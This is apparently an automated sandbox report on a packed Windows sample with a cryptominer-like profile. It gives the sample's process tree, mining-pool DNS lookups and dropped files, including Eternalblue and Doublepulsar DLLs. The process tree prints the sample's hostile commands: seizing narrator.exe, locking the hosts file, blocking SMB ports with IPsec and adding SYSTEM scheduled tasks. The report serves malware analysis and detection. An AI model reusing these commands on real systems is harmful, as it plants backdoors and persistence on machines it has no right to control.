Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	June 5, 2023, 5:57 p.m.	June 5, 2023, 5:59 p.m.

Size	3.2MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5	`b1e73ee6b76cdb99e5fcde09936de056`
SHA256	`1baaa595c6e5c48d0f8de547986623a725caf520d37112ed165497e1286e5c60`
CRC32	`F5B86AA7`
ssdeep	`98304:AH71JKBJv0G10TH8BACxv46LxeDFuKarviQrHc:Y71ABJv0GaTHix46LED4brviQ`
Yara	UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature IsPE32 - (no description)

c64.exe "C:\Users\test22\AppData\Local\Temp\c64.exe"
800
- sc.exe sc delete MicrosoftMssql
  2188
- net.exe net stop MicrosoftMysql
  2144
  - net1.exe C:\Windows\system32\net1 stop MicrosoftMysql
    2304
- ctfmona.exe C:\windows\inf\ctfmona.exe
  2244
  - cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\windows\inf\ctfmona.exe"
    2404
    - PING.EXE ping 127.0.0.1 -n 1
      2532
- sp123.exe C:\windows\inf\sp123.exe
  2440
  - cmd.exe "C:\Windows\system32\cmd.exe" /c del "C:\windows\inf\sp123.exe" > nul
    2632
- vers.exe C:\windows\inf\vers.exe
  2596
  - cmd.exe cmd /c ""C:\Windows\fonts\sql.bat" "
    2860
    - cmd.exe cmd.exe /c "C:\Windows\fonts\sql.bat" :
      2196
      - takeown.exe takeown /f C:\Windows\system32\narrator.exe /a
        3060
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
        2828
      - cacls.exe cacls C:\Windows\system32\narrator.exe /g Administrators:f
        2272
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
        2936
      - cacls.exe cacls C:\Windows\system32\narrator.exe /e /g Users:r
        2340
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
        2276
      - cacls.exe cacls C:\Windows\system32\narrator.exe /e /g Administrators:r
        3024
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
        2552
      - cacls.exe cacls C:\Windows\system32\narrator.exe /e /d SERVICE
        2072
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2960
      - cacls.exe cacls C:\Windows\system32\narrator.exe /e /d "network service"
        2096
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
        3112
      - cacls.exe cacls C:\Windows\system32\narrator.exe /e /g system:r
        3148
      - attrib.exe C:\Windows\system32\attrib +s +h +r C:\Windows\Fonts\sqlser.exe
        3256
  - xsfxdel~.exe "C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe" "C:\windows\inf\vers.exe"
    1800
- net.exe net stop mssecsvc2.0
  2812
  - net1.exe C:\Windows\system32\net1 stop mssecsvc2.0
    3056
- sc.exe sc delete mssecsvc2.0
  2880
- sc.exe sc delete mssecsvc2.1
  3048
- net.exe net stop mssecsvc2.1
  2972
  - net1.exe C:\Windows\system32\net1 stop mssecsvc2.1
    2736
- net.exe net stop serivecs
  2204
  - net1.exe C:\Windows\system32\net1 stop serivecs
    2460
- sc.exe sc delete serivecs
  2252
- net.exe net stop WmiAppSrv
  2464
  - net1.exe C:\Windows\system32\net1 stop WmiAppSrv
    2652
- sc.exe sc delete WmiAppSrv
  2804
- net.exe net stop Bcdefg
  2924
  - net1.exe C:\Windows\system32\net1 stop Bcdefg
    2408
- sc.exe sc delete Bcdefg
  2208
- net.exe net stop WSSDPSRVS
  2520
  - net1.exe C:\Windows\system32\net1 stop WSSDPSRVS
    2848
- sc.exe sc delete SSDPSRVS
  2896
- cmd.exe cmd /c C:\windows\inf\free.bat
  1792
  - takeown.exe takeown /f C:\Windows\system32\Drivers\etc\hosts /a
    3020
  - cacls.exe cacls C:\Windows\system32\Drivers\etc\hosts /g users:f
    2992
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2424
  - attrib.exe attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts
    2672
  - attrib.exe attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts
    2480
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2544
  - cacls.exe cacls C:\Windows\system32\Drivers\etc\hosts /d everyone
    2796
  - ipconfig.exe ipconfig /flushdns
    3196
  - sc.exe sc start PolicyAgent
    3276
  - sc.exe sc config PolicyAgent start= AUTO
    3424
  - netsh.exe netsh ipsec static del all
    3492
  - netsh.exe netsh ipsec static add policy name=Aliyun
    3616
  - netsh.exe netsh ipsec static add filterlist name=Allowlist
    3700
  - netsh.exe netsh ipsec static add filterlist name=denylist
    3864
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
    3972
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
    4080
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
    2684
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
    3292
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
    3384
  - netsh.exe netsh ipsec static add filteraction name=Allow action=permit
    3520
  - netsh.exe netsh ipsec static add filteraction name=deny action=block
    3612
  - netsh.exe netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
    3388
  - netsh.exe netsh ipsec static set policy name=Aliyun assign=y
    3780
  - net.exe net stop "MicrosoftMysql"
    3992
    - net1.exe C:\Windows\system32\net1 stop "MicrosoftMysql"
      4032
  - net.exe net stop "MicrosoftMssql"
    3172
    - net1.exe C:\Windows\system32\net1 stop "MicrosoftMssql"
      3268
  - sc.exe sc delete "MicrosoftMysql"
    3260
  - sc.exe sc delete "MicrosoftMssql"
    3448
  - schtasks.exe schtasks /delete /tn At1 /f
    3604
  - schtasks.exe schtasks /delete /tn At2 /f
    3652
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3600
  - schtasks.exe schtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC weekly /ST 11:30:00 /RU SYSTEM
    4072
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3896
  - schtasks.exe schtasks /create /TN "At2" /TR "C:\Windows\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM
    3936
  - takeown.exe takeown /f C:\Windows\Fonts\Mysql /a
    3104
  - attrib.exe attrib -s -h -r C:\Windows\Fonts\Mysql
    3496
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3244
  - cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
    872
  - takeown.exe takeown /f C:\Windows\Fonts\Mysql /a
    1448
  - attrib.exe attrib -s -h -r C:\Windows\Fonts\Mysql
    3664
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3804
  - cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
    3884
  - takeown.exe takeown /f C:\Windows\Fonts\Mysql /a
    3128
  - attrib.exe attrib -s -h -r C:\Windows\Fonts\Mysql
    3288
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3608
  - cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
    3680
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    4092
  - cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
    3308
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3720
  - cacls.exe cacls "C:\Windows\Fonts\Mysql\*.*" /g everyone:f
    1552
  - PING.EXE ping 127.1 -n 3
    3888
  - attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Doublepulsar.dll
    940
  - attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Doublepulsar2.dll
    2956
  - attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Eternalblue.dll
    3436
  - attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Eternalblue2.dll
    4040
  - attrib.exe attrib +r C:\Windows\Fonts\Mysql\file.txt
    2044
  - ctfmon.exe C:\Windows\Fonts\Mysql\ctfmon.exe
    1972
    - cmd.exe cmd /c ""C:\Windows\Fonts\Mysql\same.bat" "
      496
      - net.exe net stop "MicrosoftMysql"
        812
        
        net1.exe C:\Windows\system32\net1 stop "MicrosoftMysql"
        2384
      - net.exe net stop "MicrosoftMssql"
        1488
        
        net1.exe C:\Windows\system32\net1 stop "MicrosoftMssql"
        2940
      - svchost.exe svchost stop "MicrosoftFonts"
        2040
      - svchost.exe svchost stop "MicrosoftMysql"
        1176
      - sc.exe sc delete "MicrosoftMysql"
        3644
      - sc.exe sc delete "MicrosoftMssql"
        204
      - svchost.exe svchost install MicrosoftMysql "C:\Windows\Fonts\Mysql\cmd.bat"
        3784
      - svchost.exe svchost install MicrosoftMysql C:\Windows\Fonts\Mysql\cmd.bat
        2076
      - svchost.exe svchost install "MicrosoftMysql" C:\Windows\Fonts\Mysql\cmd.bat
        3868
      - PING.EXE ping 127.0.0.1 -n 20
        1616
  - PING.EXE ping 127.1 -n 7
    3488
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\tem.vbs"
  2504
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
p.f2pool.info	A 124.172.232.35	124.172.232.35
boy.f2pool.info	A 112.175.114.17	112.175.114.17

IP Address	Status	Action
112.175.114.17	Active	Moloch
124.172.232.35	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 5, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (50 out of 808 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleA June 5, 2023, 5:57 p.m.	buffer: Pinging 127.0.0.1 console_handle: 0x00000007	1	1
WriteConsoleA June 5, 2023, 5:57 p.m.	buffer: with 32 bytes of data: console_handle: 0x00000007	1	1
WriteConsoleA June 5, 2023, 5:57 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA June 5, 2023, 5:57 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA June 5, 2023, 5:57 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA June 5, 2023, 5:57 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA June 5, 2023, 5:57 p.m.	buffer: Ping statistics for 127.0.0.1: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), console_handle: 0x00000007	1	1
WriteConsoleA June 5, 2023, 5:57 p.m.	buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: C:\Windows\fonts> console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: '■' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: C:\Windows\fonts> console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: '■' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: The system cannot find the file specified. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: Deleted file - C:\Windows\system32\drivers\etc\hosts console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: netsh console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: ipsec static del all console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: netsh console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: ipsec static add policy name=Aliyun console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: netsh console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: ipsec static add filterlist name=Allowlist console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: netsh console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: ipsec static add filterlist name=denylist console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 5, 2023, 5:57 p.m.	buffer: netsh console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 5, 2023, 5:57 p.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

TEXTINCLUDE

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory June 5, 2023, 5:50 p.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000067e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0	0
NtProtectVirtualMemory June 5, 2023, 5:58 p.m.	process_identifier: 1972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 5599232 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040f000 process_handle: 0xffffffff	1	0	0

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW June 5, 2023, 5:57 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 9925464064 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Foreign language identified in PE resource (50 out of 51 events)

name

TEXTINCLUDE

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004bcc50

size

0x00000151

name

TEXTINCLUDE

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004bcc50

size

0x00000151

name

TEXTINCLUDE

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004bcc50

size

0x00000151

name

RT_CURSOR

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004bd140

size

0x000000b4

name

RT_CURSOR

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004bd140

size

0x000000b4

name

RT_CURSOR

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004bd140

size

0x000000b4

name

RT_CURSOR

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004bd140

size

0x000000b4

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004be848

size

0x00000144

name

RT_MENU

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c31e8

size

0x00000284

name

RT_MENU

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c31e8

size

0x00000284

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4430

size

0x0000018c

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4e78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4e78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4e78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4e78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4e78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4e78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4e78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4e78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4e78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4e78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4e78

size

0x00000024

name

RT_GROUP_CURSOR

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4ec4

size

0x00000022

name

RT_GROUP_CURSOR

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4ec4

size

0x00000022

name

RT_GROUP_CURSOR

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4ec4

size

0x00000022

name

RT_GROUP_ICON

language

LANG_CHINESE

filetype

Non-ISO extended-ASCII text, with no line terminators

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4f3c

size

0x00000014

name

RT_GROUP_ICON

language

LANG_CHINESE

filetype

Non-ISO extended-ASCII text, with no line terminators

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4f3c

size

0x00000014

name

RT_GROUP_ICON

language

LANG_CHINESE

filetype

Non-ISO extended-ASCII text, with no line terminators

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004c4f3c

size

0x00000014

Creates executable files on the filesystem (50 out of 52 events)

file	C:\Windows\Fonts\Mysql\wai.bat
file	C:\Windows\Fonts\Mysql\same.bat
file	C:\Windows\Fonts\Mysql\cnli-1.dll
file	C:\Windows\Fonts\Mysql\ucl.dll
file	C:\Windows\Fonts\Mysql\xdvl-0.dll
file	C:\Windows\Fonts\Mysql\taskhost.exe
file	C:\Windows\Fonts\Mysql\load.bat
file	C:\Windows\Fonts\Mysql\puls.exe
file	C:\Windows\Fonts\Mysql\poab.bat
file	C:\Windows\Fonts\Mysql\tucl-1.dll
file	C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe
file	C:\Windows\Fonts\sqlser.exe
file	C:\Windows\System32\1b9376a.dll
file	C:\Windows\Fonts\Sss.bat
file	C:\Windows\Fonts\Mysql\libeay32.dll
file	C:\Windows\Fonts\Mysql\coli-0.dll
file	C:\Windows\inf\vers.exe
file	C:\Windows\Fonts\Mysql\tufo-2.dll
file	C:\Windows\Fonts\Mysql\ssleay32.dll
file	C:\Windows\Fonts\Aaa.bat
file	C:\Users\test22\AppData\Local\Temp\tem.vbs
file	C:\Windows\System32\28915125.dll
file	C:\Windows\inf\Doublepulsar.dll
file	C:\Windows\Fonts\Mysql\bat.bat
file	C:\Windows\inf\free.bat
file	C:\Windows\Fonts\Mysql\cmd.bat
file	C:\Windows\Fonts\sql.bat
file	C:\Windows\Fonts\Mysql\poad.bat
file	C:\Windows\Fonts\Mysql\zlib1.dll
file	C:\Windows\inf\Eternalblue2.dll
file	C:\Windows\Fonts\Mysql\trch-1.dll
file	C:\Windows\Fonts\Mysql\posh-0.dll
file	C:\Windows\Fonts\sqlser.reg
file	C:\Windows\inf\ctfmona.exe
file	C:\Windows\Fonts\Mysql\NansHou.dll
file	C:\Windows\Fonts\Mysql\nei.bat
file	C:\Windows\Fonts\Mysql\wget.exe
file	C:\Windows\Fonts\Mysql\tich-1.dll
file	C:\Windows\inf\Doublepulsar2.dll
file	C:\Windows\inf\Eternalblue.dll
file	C:\Windows\Fonts\Mysql\dmgd-4.dll
file	C:\Windows\Fonts\Mysql\tibe-2.dll
file	C:\Windows\Fonts\Mysql\Eter.exe
file	C:\Windows\Fonts\Mysql\loab.bat
file	C:\Windows\Fonts\Mysql\mance.exe
file	C:\Windows\Fonts\Mysql\svchost.exe
file	C:\Windows\inf\ctfmon.exe
file	C:\Windows\Fonts\Mysql\crli-0.dll
file	C:\Windows\Fonts\Mysql\exma-1.dll
file	C:\Windows\Fonts\Mysql\trfo-2.dll

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW June 5, 2023, 5:57 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Local\Temp\tem.vbs filepath: C:\Users\test22\AppData\Local\Temp\tem.vbs	1	1	0

Creates a suspicious process (16 events)

cmdline	schtasks /delete /tn At1 /f
cmdline	"C:\Windows\system32\cmd.exe" /c del "C:\windows\inf\sp123.exe" > nul
cmdline	C:\Windows\System32\cmd.exe /c del "C:\windows\inf\sp123.exe" > nul
cmdline	svchost stop "MicrosoftMysql"
cmdline	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\windows\inf\ctfmona.exe"
cmdline	cmd.exe /c ping 127.0.0.1 -n 1 && del /f/q "C:\windows\inf\ctfmona.exe"
cmdline	svchost install MicrosoftMysql C:\Windows\Fonts\Mysql\cmd.bat
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	cmd.exe /c "C:\Windows\fonts\sql.bat" :
